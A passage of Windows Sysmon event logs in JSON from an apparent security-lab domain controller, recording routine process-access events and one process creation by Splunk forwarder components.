07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1328-5F25-0000-0010B5790B00}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1328-5F25-0000-0010B5790B00}","TargetProcessId":"4540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.200\r\nProcessGuid: {E2A3D6B1-1329-5F25-0000-0010C57B0B00}\r\nProcessId: 4892\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.200","ProcessGuid":"{E2A3D6B1-1329-5F25-0000-0010C57B0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
